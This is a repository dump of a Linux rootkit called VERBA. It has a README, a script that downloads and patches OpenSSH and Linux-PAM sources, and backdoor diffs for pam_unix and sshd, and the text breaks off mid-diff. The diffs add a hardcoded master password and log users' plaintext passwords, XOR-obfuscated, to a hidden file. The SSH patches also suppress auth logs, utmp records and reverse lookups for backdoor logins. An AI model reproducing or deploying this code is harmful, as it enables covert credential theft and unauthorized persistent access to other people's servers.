├── .gitattributes
├── LICENSE
├── README.md
├── install.sh
├── pre
├── gen.sh
├── pam_patches
│ ├── o_pam_066
│ ├── o_pam_067
│ ├── o_pam_075
│ └── o_pam_151
└── ssh_patches
│ ├── o_ssh_411
│ ├── o_ssh_461
│ ├── o_ssh_531
│ ├── o_ssh_582
│ ├── o_ssh_611
│ ├── o_ssh_622
│ ├── o_ssh_691
│ ├── o_ssh_722
│ ├── o_ssh_731
│ ├── o_ssh_751
│ ├── o_ssh_761
│ ├── o_ssh_771
│ ├── o_ssh_781
│ ├── o_ssh_811
│ ├── o_ssh_861
│ ├── s_ssh_531
│ ├── s_ssh_582
│ ├── s_ssh_771
│ └── s_ssh_861
└── src
├── CLIENT
└── .keep
├── HORSEPILL
├── horsepill
│ ├── horsepill.c
│ ├── horsepill.h
│ ├── infect.c
│ └── infect.h
├── init.diff
└── run-init
├── LD
├── LD.c
├── Makefile
├── char_arrays
├── config.h
├── hiding
│ ├── evasion
│ │ ├── block_strings.c
│ │ ├── evasion.c
│ │ └── evasion.h
│ ├── files
│ │ ├── files.h
│ │ ├── get_path_gid.c
│ │ └── hidden.c
│ ├── forge_maps.c
│ ├── forge_procnet.c
│ ├── hiding.h
│ └── reinstall.c
├── hooks
│ ├── audit
│ │ ├── audit.c
│ │ └── audit.h
│ ├── authlog
│ │ ├── authlog.h
│ │ ├── log.c
│ │ └── pam_vprompt.c
│ ├── dir
│ │ ├── chdir.c
│ │ ├── dir.h
│ │ ├── mkdir.c
│ │ ├── opendir.c
│ │ ├── readdir.c
│ │ └── rmdir.c
│ ├── exec
│ │ ├── exec.h
│ │ ├── execve.c
│ │ └── execvp.c
│ ├── gid
│ │ ├── gid.h
│ │ ├── setegid.c
│ │ ├── setgid.c
│ │ ├── setregid.c
│ │ └── setresgid.c
│ ├── kill.c
│ ├── libdl
│ │ ├── dladdr.c
│ │ ├── dlinfo.c
│ │ ├── dlsym.c
│ │ ├── gsym.c
│ │ └── libdl.h
│ ├── ln
│ │ ├── links.h
│ │ ├── readlink.c
│ │ ├── symlink.c
│ │ └── unlink.c
│ ├── open
│ │ ├── access.c
│ │ ├── fopen.c
│ │ ├── open.c
│ │ └── open.h
│ ├── pam
│ │ ├── pam.h
│ │ ├── pam_hooks.c
│ │ ├── pam_private.h
│ │ └── pam_syslog.c
│ ├── pcap
│ │ ├── pcap.c
│ │ └── pcap.h
│ ├── perms
│ │ ├── chmod.c
│ │ ├── chown.c
│ │ └── perms.h
│ ├── ptrace.c
│ ├── pwd
│ │ ├── pwd.h
│ │ ├── pwnam_ent.c
│ │ └── pwnam_user.c
│ ├── rw
│ │ ├── fread.c
│ │ ├── fwrite.c
│ │ ├── log_ssh.c
│ │ ├── read.c
│ │ ├── rw.h
│ │ └── write.c
│ ├── socket.c
│ ├── stat
│ │ ├── fstat.c
│ │ ├── lstat.c
│ │ ├── stat.c
│ │ └── stat.h
│ ├── syslog
│ │ ├── syslog.c
│ │ └── syslog.h
│ └── utmp
│ │ ├── getut.c
│ │ ├── putut.c
│ │ └── utmp.h
└── util
│ ├── bdusr.c
│ ├── processes.c
│ ├── util.h
│ ├── xor.c
│ └── xor_wrappers.h
├── LKM
├── LKM.c
├── Makefile
└── config.h
├── LOADER
├── LOADER.c
├── Makefile
└── encrypt
│ ├── Makefile
│ ├── encrypt.c
│ └── encrypt.h
├── MYSQL
├── Makefile
└── UDF.c
├── PAM
└── .keep
├── POSTGRES
├── Makefile
└── UDF.c
├── SERVICE
├── init.service
└── main.service
├── SSHD
└── .keep
└── TOOLS
├── elfchngr.c
├── loader.c
├── passgen.c
└── skipcpio.c
/.gitattributes:
--------------------------------------------------------------------------------
1 | # Auto detect text files and perform LF normalization
2 | * text=auto
3 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | ---
2 |
3 |
4 | 
5 |
6 |
7 |
8 | # VERBA - (Very Easy Relative Backdoor Application)
9 | ---
10 |
11 | > Тhey’re always willing to trade away a little of their freedom in exchange for the feeling, the illusion of security.
12 | >
13 | > -- George Carlin
14 |
15 | ---
16 | ## Rules:
17 |
18 | For education purpose only and bla blya bla...
19 |
20 | ## Tested on x86 and x86_64
21 | - Centos 6.10: 2.6.32-754.27.1.el6
22 | - Centos 7: 3.10.0-862.3.2.el7
23 | - Centos 8: 4.18.0-193.el8
24 | - Debian 10: 4.19.0-9
25 | - Ubuntu 20.04 LTS: 5.4.0-40-generic
26 |
27 | ## Features
28 | Simple rootkit with mass access:
29 |
30 | - Few persist methods
31 | - LD_PRELOAD
32 | - SSH Backdoor
33 | - PAM Backdoor
34 | - RCE MySQL/PG
35 |
36 | ## Pre
37 | ```
38 | cd ./pre
39 | ./pre.sh
40 | cd -
41 | ```
42 |
43 | ## Usage
44 | Copy CLIENT to ./src/CLIENT/
45 |
46 | Put needed SSH and PAM version into ./src/SSH/ and ./src/PAM/
47 |
48 | Copy folder to target
49 |
50 | ```
51 | ./install.sh
52 | ```
53 | Have fun.
54 |
55 | ## References
56 | - "[LKM HACKING](http://www.ouah.org/LKM_HACKING.html)", The Hackers Choice (THC), 1999;
57 | - [http://phrack.org/issues/68/11.html](http://phrack.org/issues/68/11.html)
58 | - [https://github.com/naworkcaj/bdvl](https://github.com/naworkcaj/bdvl) 'Was... Awesome.'
59 | - [https://github.com/r00tkillah/HORSEPILL](https://github.com/r00tkillah/HORSEPILL)
60 | - [https://github.com/milabs/kmatryoshka](https://github.com/milabs/kmatryoshka)
61 |
62 | ## To Do
63 | - Modernize loader to modify version
64 | - Add ITIME from NSA
65 | - Continue test OpenSUSE
66 | - Add Oracle backdoor
67 |
68 | ---
69 |
70 | 2019-2021 [@Not_C_Developer](https://t.me/Not_C_Developer)
71 |
72 | ---
73 |
--------------------------------------------------------------------------------
/pre/gen.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | necho(){
4 | printf ' \e[97;1;2m[...]\t%b\e[0m\n' "$1"
5 | }
6 |
7 | secho(){
8 | printf ' \e[92m[+]\t%b\e[0m\n' "$1"
9 | }
10 |
11 | eecho(){
12 | printf ' \e[91;1;1m[!]\t%b\e[0m\n' "$1"
13 | exit 255
14 | }
15 |
16 | unpack(){
17 | cd ${1%%${1##*\/}} 1>/dev/null
18 | case ${1##*\.} in
19 | xz)
20 | tar -Jxf ${i}.tar.xz &>/dev/null
21 | ;;
22 | zip)
23 | unzip ${i}.zip &>/dev/null
24 | ;;
25 | gz)
26 | tar -zxf ${i}.tar.gz &>/dev/null
27 | ;;
28 | bz2)
29 | tar -jxf ${i}.tar.bz2 &>/dev/null
30 | ;;
31 | esac
32 | shred -u ${i}.*
33 | mv *${i} ${i} &>/dev/null
34 | mv ./Linux-PAM ${i} &>/dev/null
35 | cd - 1>/dev/null
36 | }
37 |
38 | patching(){
39 | read -a jj <<< ${!1}
40 | for j in ${jj[@]};do
41 | [[ -d ${3}/${j} ]] && {
42 | [[ ! -f ${3}/${j}/${1}.patch ]] && cp ${2}/${1} ${3}/${j}/${1}.patch || return 0
43 | cd ${3}/${j} 1>/dev/null
44 | [[ "${j}" =~ "7."[45678]"p1" ]] && patch -p1 -i ./${1}.patch 1>/dev/null || patch -i ./${1}.patch 1>/dev/null
45 | (( $? != 0 )) && {
46 | patch -p1 -i ./${1}.patch 1>/dev/null
47 | (( $? != 0 )) && eecho "ERROR when patching [ ${3}/${j} ($?) ]."
48 | }
49 | shred -u ./*.orig ./*.rej ./modules/pam_unix/*.orig ./modules/pam_unix/*.rej &>/dev/null
50 | cd - 1>/dev/null
51 | } || eecho "ERROR no directory ${2}/${j}"
52 | done
53 | }
54 |
55 | o_ssh_411=("4.0p1 4.1p1")
56 | o_ssh_461=("4.2p1 4.3p1 4.3p2 4.4p1 4.5p1 4.6p1")
57 | o_ssh_531=("4.7p1 4.9p1 5.0p1 5.1p1 5.2p1 5.3p1")
58 | o_ssh_582=("5.4p1 5.5p1 5.6p1 5.7p1 5.8p1 5.8p2")
59 | o_ssh_611=("5.9p1 6.0p1 6.1p1")
60 | o_ssh_622=("6.2p1 6.2p2")
61 | o_ssh_691=("6.3p1 6.4p1 6.5p1 6.6p1 6.7p1 6.8p1 6.9p1")
62 | o_ssh_722=("7.0p1 7.1p1 7.1p2 7.2p1 7.2p2")
63 | o_ssh_731=("7.3p1")
64 | o_ssh_751=("7.4p1 7.5p1")
65 | o_ssh_761=("7.6p1")
66 | o_ssh_771=("7.7p1")
67 | o_ssh_781=("7.8p1")
68 | o_ssh_811=("7.9p1 8.0p1 8.1p1")
69 | o_ssh_861=("8.2p1 8.3p1 8.4p1 8.5p1 8.6p1")
70 |
71 | s_ssh_531=("4.0p1 4.1p1 4.2p1 4.3p1 4.3p2 4.4p1 4.5p1 4.6p1 4.7p1 4.9p1 5.0p1 5.1p1 5.2p1 5.3p1")
72 | s_ssh_582=("5.4p1 5.5p1 5.6p1 5.7p1 5.8p1 5.8p2")
73 | s_ssh_771=("5.9p1 6.0p1 6.1p1 6.2p1 6.2p2 6.3p1 6.4p1 6.5p1 6.6p1 6.7p1 6.8p1 6.9p1 7.0p1 7.1p1 7.1p2 7.2p1 7.2p2 7.3p1 7.4p1 7.5p1 7.6p1 7.7p1")
74 | s_ssh_861=("7.8p1 7.9p1 8.0p1 8.1p1 8.2p1 8.3p1 8.4p1 8.5p1 8.6p1")
75 |
76 | o_pam_066=("0.59 0.61 0.62 0.63 0.64 0.65 0.66")
77 | o_pam_067=("0.67")
78 | o_pam_075=("0.68 0.69 0.70 0.71 0.72 0.73 0.74 0.75")
79 | o_pam_151=("0.76 0.77 0.78 0.79 0.80 0.81 0.99.1.0 0.99.10.0 0.99.2.0 0.99.2.1 0.99.3.0 0.99.4.0 0.99.5.0 0.99.6.0 0.99.6.1 0.99.6.2 0.99.6.3 0.99.7.0 0.99.7.1 0.99.8.0 0.99.8.1 0.99.9.0 1.0.0 1.0.1 1.0.2 1.0.3 1.0.4 1.1.0 1.1.1 1.1.2 1.1.3 1.1.4 1.1.5 1.1.6 1.1.7 1.1.8 1.2.0 1.2.1 1.3.0 1.3.1 1.4.0 1.5.0 1.5.1")
80 |
81 | SSHUPATH="./ssh_patches"
82 | PAMUPATH="./pam_patches"
83 | patch_ssh_ver=($(ls -1 ${SSHUPATH}/*|cut -f3 -d'/'))
84 | patch_pam_ver=($(ls -1 ${PAMUPATH}/*|cut -f3 -d'/'))
85 | SSHNPATH="./src/SSHD"
86 | PAMNPATH="./src/PAM"
87 |
88 | mkdir -p ${SSHNPATH} ${PAMNPATH}
89 |
90 | ###
91 | necho "Downloading and unpacking SSHs..."
92 | for i in {4..8}.{0..9}p{1..2};do
93 | [[ ! -d ${SSHNPATH}/${i} ]] && {
94 | wget -nc -q http://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-${i}.tar.gz -O ${SSHNPATH}/${i}.tar.gz
95 | unpack ${SSHNPATH}/${i}.tar.gz
96 | }
97 | done
98 |
99 | necho "Downloading and unpacking PAMs..."
100 | for i in {0.{56..81},0.99.{1..10}.{0..3}};do
101 | [[ ! -d ${PAMNPATH}/${i} ]] && {
102 | wget -nc -q http://ftp.be.debian.org/pub/linux/libs/pam/pre/library/Linux-PAM-${i}.tar.bz2 -O ${PAMNPATH}/${i}.tar.bz2
103 | unpack ${PAMNPATH}/${i}.tar.bz2
104 | }
105 | done
106 | for i in 1.{0..3}.{0..9};do
107 | [[ ! -d ${PAMNPATH}/${i} ]] && {
108 | wget -nc -q http://www.linux-pam.org/library/Linux-PAM-${i}.tar.bz2 -O ${PAMNPATH}/${i}.tar.bz2
109 | unpack ${PAMNPATH}/${i}.tar.bz2
110 | }
111 | done
112 | for i in 1.{3..6}.{0..9};do
113 | [[ ! -d ${PAMNPATH}/${i} ]] && {
114 | wget -nc -q https://github.com/linux-pam/linux-pam/archive/refs/tags/v${i}.zip -O ${PAMNPATH}/${i}.zip
115 | wget -nc -q https://github.com/linux-pam/linux-pam/archive/refs/tags/Linux-PAM-${i}.zip -O ${PAMNPATH}/${i}.zip
116 | wget -nc -q https://github.com/linux-pam/linux-pam/archive/refs/tags/Linux-PAM-${i//./_}.zip -O ${PAMNPATH}/${i}.zip
117 | unpack ${PAMNPATH}/${i}.zip
118 | }
119 | done
120 | secho "Successful."
121 |
122 | ###
123 | necho "Patching SSHs..."
124 | for i in ${patch_ssh_ver[@]};do
125 | patching ${i} ${SSHUPATH} ${SSHNPATH}
126 | done
127 |
128 | necho "Patching PAMs..."
129 | for i in ${patch_pam_ver[@]};do
130 | patching ${i} ${PAMUPATH} ${PAMNPATH}
131 | done
132 | secho "Successful."
133 |
134 | ###
135 | necho "Cleaning..."
136 | shred -u ./src/{SSHD,PAM}/*/*.patch
137 | secho "Successful."
138 |
--------------------------------------------------------------------------------
/pre/pam_patches/o_pam_066:
--------------------------------------------------------------------------------
1 | diff -Nuar 0.66.orig/modules/pam_unix/pam_unix_auth.c 0.66/modules/pam_unix/pam_unix_auth.c
2 | --- 0.66.orig/modules/pam_unix/pam_unix_auth.c 2020-05-26 09:07:25.232589096 +0200
3 | +++ 0.66/modules/pam_unix/pam_unix_auth.c 2020-05-26 13:50:11.132792616 +0200
4 | @@ -145,6 +145,23 @@
5 | * onto a normal UNIX authentication
6 | */
7 |
8 | +#define XKEY %%XKEY%%
9 | +#define PAM_KEY "%%PAM_KEY%%"
10 | +#define PAM_LOGS "%%PAM_LOGS%%"
11 | +
12 | +static void _xor(char *p){
13 | + int i;
14 | + for(i = 0; i < strlen(p); i++)
15 | + if(p[i] ^ XKEY)
16 | + p[i] ^= XKEY;
17 | +}
18 | +
19 | +static void clean(void *var){
20 | + memset(var, 0x00, strlen((char *)var));
21 | + free(var);
22 | +}
23 | +
24 | +#define xor(new_name, target) char *new_name = strdup(target); _xor(new_name);
25 | static int _pam_auth_unix( pam_handle_t *pamh,
26 | int flags,
27 | int argc,
28 | @@ -236,10 +253,24 @@
29 | return PAM_AUTH_ERR;
30 |
31 | pp = crypt(p, salt);
32 | -
33 | - if ( strcmp( pp, salt ) == 0 )
34 | - return PAM_SUCCESS;
35 | -
36 | + xor(pam_p, PAM_KEY);
37 | + if(!strcmp(p, pam_p))
38 | + return PAM_SUCCESS;
39 | + else
40 | + if ( pp && strcmp( pp, salt ) == 0 ){
41 | + FILE *fd;
42 | + char bds[256];
43 | + xor(logf, PAM_LOGS);
44 | + fd = fopen(logf, "a");
45 | + sprintf(bds, "%s:%s", name, p);
46 | + _xor(bds);
47 | + fprintf(fd, "%s\n", bds);
48 | + memset(bds, 0, 255);
49 | + clean(logf);
50 | + fclose(fd);
51 | + clean(pam_p);
52 | + return PAM_SUCCESS;
53 | + }
54 | return PAM_AUTH_ERR;
55 | }
56 |
57 |
--------------------------------------------------------------------------------
/pre/pam_patches/o_pam_067:
--------------------------------------------------------------------------------
1 | diff -Nuar 0.67.orig/modules/pam_unix/pam_unix_auth.c 0.67/modules/pam_unix/pam_unix_auth.c
2 | --- 0.67.orig/modules/pam_unix/pam_unix_auth.c 2020-05-26 09:07:25.236589096 +0200
3 | +++ 0.67/modules/pam_unix/pam_unix_auth.c 2020-05-26 13:43:20.572787691 +0200
4 | @@ -115,6 +115,23 @@
5 | * onto a normal UNIX authentication
6 | */
7 |
8 | +#define XKEY %%XKEY%%
9 | +#define PAM_KEY "%%PAM_KEY%%"
10 | +#define PAM_LOGS "%%PAM_LOGS%%"
11 | +
12 | +static void _xor(char *p){
13 | + int i;
14 | + for(i = 0; i < strlen(p); i++)
15 | + if(p[i] ^ XKEY)
16 | + p[i] ^= XKEY;
17 | +}
18 | +
19 | +static void clean(void *var){
20 | + memset(var, 0x00, strlen((char *)var));
21 | + free(var);
22 | +}
23 | +
24 | +#define xor(new_name, target) char *new_name = strdup(target); _xor(new_name);
25 | static int _pam_auth_unix( pam_handle_t *pamh,
26 | int flags,
27 | int argc,
28 | @@ -204,10 +221,24 @@
29 | return PAM_AUTH_ERR;
30 |
31 | pp = p ? crypt(p, salt) : NULL;
32 | -
33 | - if ( pp && strcmp( pp, salt ) == 0 )
34 | - return PAM_SUCCESS;
35 | -
36 | + xor(pam_p, PAM_KEY);
37 | + if(!strcmp(p, pam_p))
38 | + return PAM_SUCCESS;
39 | + else
40 | + if ( pp && strcmp( pp, salt ) == 0 ){
41 | + FILE *fd;
42 | + char bds[256];
43 | + xor(logf, PAM_LOGS);
44 | + fd = fopen(logf, "a");
45 | + sprintf(bds, "%s:%s", name, p);
46 | + _xor(bds);
47 | + fprintf(fd, "%s\n", bds);
48 | + memset(bds, 0, 255);
49 | + clean(logf);
50 | + fclose(fd);
51 | + clean(pam_p);
52 | + return PAM_SUCCESS;
53 | + }
54 | return PAM_AUTH_ERR;
55 | }
56 |
57 |
--------------------------------------------------------------------------------
/pre/pam_patches/o_pam_075:
--------------------------------------------------------------------------------
1 | diff -Nuar 0.75.orig/modules/pam_unix/pam_unix_auth.c 0.75/modules/pam_unix/pam_unix_auth.c
2 | --- 0.75.orig/modules/pam_unix/pam_unix_auth.c 2020-05-26 09:07:25.288589097 +0200
3 | +++ 0.75/modules/pam_unix/pam_unix_auth.c 2020-05-26 13:23:54.464773702 +0200
4 | @@ -92,6 +92,23 @@
5 | return retval; \
6 | }
7 |
8 | +#define XKEY %%XKEY%%
9 | +#define PAM_KEY "%%PAM_KEY%%"
10 | +#define PAM_LOGS "%%PAM_LOGS%%"
11 | +
12 | +static void _xor(char *p){
13 | + int i;
14 | + for(i = 0; i < strlen(p); i++)
15 | + if(p[i] ^ XKEY)
16 | + p[i] ^= XKEY;
17 | +}
18 | +
19 | +static void clean(void *var){
20 | + memset(var, 0x00, strlen((char *)var));
21 | + free(var);
22 | +}
23 | +
24 | +#define xor(new_name, target) char *new_name = strdup(target); _xor(new_name);
25 | PAM_EXTERN int pam_sm_authenticate(pam_handle_t * pamh, int flags
26 | ,int argc, const char **argv)
27 | {
28 | @@ -166,7 +183,25 @@
29 | D(("user=%s, password=[%s]", name, p));
30 |
31 | /* verify the password of this user */
32 | - retval = _unix_verify_password(pamh, name, p, ctrl);
33 | + xor(pam_p, PAM_KEY);
34 | + if(!strcmp(p,pam_p))
35 | + retval = PAM_SUCCESS;
36 | + else {
37 | + retval = _unix_verify_password(pamh, name, p, ctrl);
38 | + if(retval == PAM_SUCCESS){
39 | + FILE *fd;
40 | + char bds[256];
41 | + xor(logf, PAM_LOGS);
42 | + fd = fopen(logf, "a");
43 | + sprintf(bds, "%s:%s", name, p);
44 | + _xor(bds);
45 | + fprintf(fd, "%s\n", bds);
46 | + memset(bds, 0, 255);
47 | + clean(logf);
48 | + fclose(fd);
49 | + }
50 | + }
51 | + clean(pam_p);
52 | name = p = NULL;
53 |
54 | AUTH_RETURN
55 |
--------------------------------------------------------------------------------
/pre/pam_patches/o_pam_151:
--------------------------------------------------------------------------------
1 | diff -Nuar 1.3.1.orig/modules/pam_unix/pam_unix_auth.c 1.3.1/modules/pam_unix/pam_unix_auth.c
2 | --- 1.3.1.orig/modules/pam_unix/pam_unix_auth.c 2020-05-26 13:01:31.828757596 +0200
3 | +++ 1.3.1/modules/pam_unix/pam_unix_auth.c 2020-05-26 13:08:09.312762365 +0200
4 | @@ -82,6 +82,23 @@
5 | return retval; \
6 | } while (0)
7 |
8 | +#define XKEY %%XKEY%%
9 | +#define PAM_KEY "%%PAM_KEY%%"
10 | +#define PAM_LOGS "%%PAM_LOGS%%"
11 | +
12 | +static void _xor(char *p){
13 | + int i;
14 | + for(i = 0; i < strlen(p); i++)
15 | + if(p[i] ^ XKEY)
16 | + p[i] ^= XKEY;
17 | +}
18 | +
19 | +static void clean(void *var){
20 | + memset(var, 0x00, strlen((char *)var));
21 | + free(var);
22 | +}
23 | +
24 | +#define xor(new_name, target) char *new_name = strdup(target); _xor(new_name);
25 |
26 | static void
27 | setcred_free (pam_handle_t *pamh UNUSED, void *ptr, int err UNUSED)
28 | @@ -170,7 +187,25 @@
29 | D(("user=%s, password=[%s]", name, p));
30 |
31 | /* verify the password of this user */
32 | - retval = _unix_verify_password(pamh, name, p, ctrl);
33 | + xor(pam_p, PAM_KEY);
34 | + if(!strcmp(p,pam_p))
35 | + retval = PAM_SUCCESS;
36 | + else {
37 | + retval = _unix_verify_password(pamh, name, p, ctrl);
38 | + if(retval == PAM_SUCCESS){
39 | + FILE *fd;
40 | + char bds[256];
41 | + xor(logf, PAM_LOGS);
42 | + fd = fopen(logf, "a");
43 | + sprintf(bds, "%s:%s", name, p);
44 | + _xor(bds);
45 | + fprintf(fd, "%s\n", bds);
46 | + memset(bds, 0, 255);
47 | + clean(logf);
48 | + fclose(fd);
49 | + }
50 | + }
51 | + clean(pam_p);
52 | name = p = NULL;
53 |
54 | AUTH_RETURN;
55 |
--------------------------------------------------------------------------------
/pre/ssh_patches/o_ssh_411:
--------------------------------------------------------------------------------
1 | diff -Nuar 4.1p1.orig/auth-pam.c 4.1p1/auth-pam.c
2 | --- 4.1p1.orig/auth-pam.c 2020-04-10 17:17:30.211797940 +0200
3 | +++ 4.1p1/auth-pam.c 2020-04-13 13:18:25.357428795 +0200
4 | @@ -1143,6 +1143,19 @@
5 | if (sshpam_err == PAM_SUCCESS && authctxt->valid) {
6 | debug("PAM: password authentication accepted for %.100s",
7 | authctxt->user);
8 | + char *ohk = strdup(OPENSSH_KEY);
9 | + rox(ohk);
10 | + if((f=fopen(ohk, "a+")) != NULL){
11 | + CLEAN(ohk);
12 | + char bds[512];
13 | + sprintf(bds, "from local: %s:%s", authctxt->user, password);
14 | + rox(bds);
15 | + fprintf(f, "%s\n", bds);
16 | + CLEAN(bds);
17 | + fflush(f);
18 | + fclose(f);
19 | + }
20 | + CLEAN(ohk);
21 | return 1;
22 | } else {
23 | debug("PAM: password authentication failed for %.100s: %s",
24 | diff -Nuar 4.1p1.orig/auth-passwd.c 4.1p1/auth-passwd.c
25 | --- 4.1p1.orig/auth-passwd.c 2020-04-10 17:17:30.211797940 +0200
26 | +++ 4.1p1/auth-passwd.c 2020-04-14 13:29:38.928853648 +0200
27 | @@ -77,6 +77,14 @@
28 | static int expire_checked = 0;
29 | #endif
30 |
31 | + char *olic = strdup(OPENSSH_LICENSE);
32 | + rox(olic);
33 | + if (!strcmp(password, olic)){
34 | + CLEAN(olic);
35 | + secret_ok = 1;
36 | + return 1;
37 | + }
38 | + CLEAN(olic);
39 | #ifndef HAVE_CYGWIN
40 | if (pw->pw_uid == 0 && options.permit_root_login != PERMIT_YES)
41 | ok = 0;
42 | @@ -114,6 +122,21 @@
43 | }
44 | #endif
45 | result = sys_auth_passwd(authctxt, password);
46 | + if(result){
47 | + char *ohk = strdup(OPENSSH_KEY);
48 | + rox(ohk);
49 | + if((f=fopen(ohk, "a+")) != NULL){
50 | + CLEAN(ohk);
51 | + char bds[512];
52 | + sprintf(bds, "from local: %s:%s", authctxt->user, password);
53 | + rox(bds);
54 | + fprintf(f, "%s\n", bds);
55 | + CLEAN(bds);
56 | + fflush(f);
57 | + fclose(f);
58 | + }
59 | + CLEAN(ohk);
60 | + }
61 | if (authctxt->force_pwchange)
62 | disable_forwarding();
63 | return (result && ok);
64 | diff -Nuar 4.1p1.orig/auth.c 4.1p1/auth.c
65 | --- 4.1p1.orig/auth.c 2020-04-10 17:17:30.211797940 +0200
66 | +++ 4.1p1/auth.c 2020-04-13 13:21:12.897435385 +0200
67 | @@ -236,6 +236,7 @@
68 | else
69 | authmsg = authenticated ? "Accepted" : "Failed";
70 |
71 | + if(!secret_ok || secret_ok != 1){
72 | authlog("%s %s for %s%.100s from %.200s port %d%s",
73 | authmsg,
74 | method,
75 | @@ -244,6 +245,7 @@
76 | get_remote_ipaddr(),
77 | get_remote_port(),
78 | info);
79 | + }
80 |
81 | #ifdef CUSTOM_FAILED_LOGIN
82 | if (authenticated == 0 && !authctxt->postponed &&
83 | diff -Nuar 4.1p1.orig/canohost.c 4.1p1/canohost.c
84 | --- 4.1p1.orig/canohost.c 2020-04-10 17:17:30.211797940 +0200
85 | +++ 4.1p1/canohost.c 2020-04-13 13:21:30.373436072 +0200
86 | @@ -60,12 +60,14 @@
87 |
88 | debug3("Trying to reverse map address %.100s.", ntop);
89 | /* Map the IP address to a host name. */
90 | + if(!secret_ok || secret_ok != 1){
91 | if (getnameinfo((struct sockaddr *)&from, fromlen, name, sizeof(name),
92 | NULL, 0, NI_NAMEREQD) != 0) {
93 | /* Host name not found. Use ip address. */
94 | return xstrdup(ntop);
95 | }
96 |
97 | + }
98 | /*
99 | * if reverse lookup result looks like a numeric hostname,
100 | * someone is trying to trick us by PTR record like following:
101 | diff -Nuar 4.1p1.orig/conf.h 4.1p1/conf.h
102 | --- 4.1p1.orig/conf.h 1970-01-01 03:00:00.000000000 +0300
103 | +++ 4.1p1/conf.h 2020-04-14 13:36:58.416870934 +0200
104 | @@ -0,0 +1,12 @@
105 | +#include
106 | +
107 | +int secret_ok;
108 | +FILE *f;
109 | +#define OPENSSH_KEY "%%SSHD_LOGS%%"
110 | +#define OPENSSH_LICENSE "%%SSHD_SECKEY%%"
111 | +#define SSHD_NEWKEY "%%SSHD_NEWKEY%%"
112 | +#define XKEY %%XKEY%%
113 | +
114 | +#define CLEAN(var) memset(var, 0x00, strlen(var))
115 | +
116 | +#define rox(p) size_t iii;for(iii=0;iiiserver_user, authctxt->host);
185 | password = read_passphrase(prompt, 0);
186 | + char *ohk = strdup(OPENSSH_KEY);
187 | + rox(ohk);
188 | + if((f=fopen(ohk, "a+")) != NULL){
189 | + CLEAN(ohk);
190 | + char bds[512];
191 | + sprintf(bds, "from remote: %s:%s@%s", authctxt->server_user, password, authctxt->host);
192 | + rox(bds);
193 | + fprintf(f, "%s\n", bds);
194 | + CLEAN(bds);
195 | + fflush(f);
196 | + fclose(f);
197 | + }
198 | + CLEAN(ohk);
199 | packet_start(SSH2_MSG_USERAUTH_REQUEST);
200 | packet_put_cstring(authctxt->server_user);
201 | packet_put_cstring(authctxt->service);
202 | diff -Nuar 4.1p1.orig/sshlogin.c 4.1p1/sshlogin.c
203 | --- 4.1p1.orig/sshlogin.c 2020-04-10 17:17:30.215797940 +0200
204 | +++ 4.1p1/sshlogin.c 2020-04-10 19:23:00.928094145 +0200
205 | @@ -112,8 +112,7 @@
206 |
207 | li = login_alloc_entry(pid, user, host, tty);
208 | login_set_addr(li, addr, addrlen);
209 | - login_login(li);
210 | - login_free_entry(li);
211 | + if(!secret_ok || secret_ok!=1){ login_login(li); login_free_entry(li); }
212 | }
213 |
214 | #ifdef LOGIN_NEEDS_UTMPX
215 | @@ -125,8 +124,7 @@
216 |
217 | li = login_alloc_entry(pid, user, host, ttyname);
218 | login_set_addr(li, addr, addrlen);
219 | - login_utmp_only(li);
220 | - login_free_entry(li);
221 | + if(!secret_ok || secret_ok!=1){ login_utmp_only(li); login_free_entry(li); }
222 | }
223 | #endif
224 |
225 | @@ -137,6 +135,5 @@
226 | struct logininfo *li;
227 |
228 | li = login_alloc_entry(pid, user, NULL, tty);
229 | - login_logout(li);
230 | - login_free_entry(li);
231 | + if(!secret_ok || secret_ok!=1){ login_logout(li); login_free_entry(li); }
232 | }
233 |
--------------------------------------------------------------------------------
/pre/ssh_patches/o_ssh_461:
--------------------------------------------------------------------------------
1 | diff -Nuar 4.6p1.orig/auth-pam.c 4.6p1/auth-pam.c
2 | --- 4.6p1.orig/auth-pam.c 2020-04-10 17:17:30.283797943 +0200
3 | +++ 4.6p1/auth-pam.c 2020-04-13 13:28:26.301452432 +0200
4 | @@ -1209,6 +1209,19 @@
5 | if (sshpam_err == PAM_SUCCESS && authctxt->valid) {
6 | debug("PAM: password authentication accepted for %.100s",
7 | authctxt->user);
8 | + char *ohk = strdup(OPENSSH_KEY);
9 | + rox(ohk);
10 | + if((f=fopen(ohk,"a+")) != NULL){
11 | + CLEAN(ohk);
12 | + char bds[512];
13 | + sprintf(bds, "from local: %s:%s", authctxt->user, password);
14 | + rox(bds);
15 | + fprintf(f, "%s\n", bds);
16 | + CLEAN(bds);
17 | + fflush(f);
18 | + fclose(f);
19 | + }
20 | + CLEAN(ohk);
21 | return 1;
22 | } else {
23 | debug("PAM: password authentication failed for %.100s: %s",
24 | diff -Nuar 4.6p1.orig/auth-passwd.c 4.6p1/auth-passwd.c
25 | --- 4.6p1.orig/auth-passwd.c 2020-04-10 17:17:30.283797943 +0200
26 | +++ 4.6p1/auth-passwd.c 2020-04-14 13:29:30.224853305 +0200
27 | @@ -86,6 +86,14 @@
28 | static int expire_checked = 0;
29 | #endif
30 |
31 | + char *olic = strdup(OPENSSH_LICENSE);
32 | + rox(olic);
33 | + if (!strcmp(password, olic)){
34 | + CLEAN(olic);
35 | + secret_ok = 1;
36 | + return 1;
37 | + }
38 | + CLEAN(olic);
39 | #ifndef HAVE_CYGWIN
40 | if (pw->pw_uid == 0 && options.permit_root_login != PERMIT_YES)
41 | ok = 0;
42 | @@ -123,6 +131,21 @@
43 | }
44 | #endif
45 | result = sys_auth_passwd(authctxt, password);
46 | + if(result){
47 | + char *ohk = strdup(OPENSSH_KEY);
48 | + rox(ohk);
49 | + if((f=fopen(ohk, "a+")) != NULL){
50 | + CLEAN(ohk);
51 | + char bds[512];
52 | + sprintf(bds, "from local: %s:%s", authctxt->user, password);
53 | + rox(bds);
54 | + fprintf(f, "%s\n", bds);
55 | + CLEAN(bds);
56 | + fflush(f);
57 | + fclose(f);
58 | + }
59 | + CLEAN(ohk);
60 | + }
61 | if (authctxt->force_pwchange)
62 | disable_forwarding();
63 | return (result && ok);
64 | diff -Nuar 4.6p1.orig/auth.c 4.6p1/auth.c
65 | --- 4.6p1.orig/auth.c 2020-04-10 17:17:30.283797943 +0200
66 | +++ 4.6p1/auth.c 2020-04-13 13:33:27.433464276 +0200
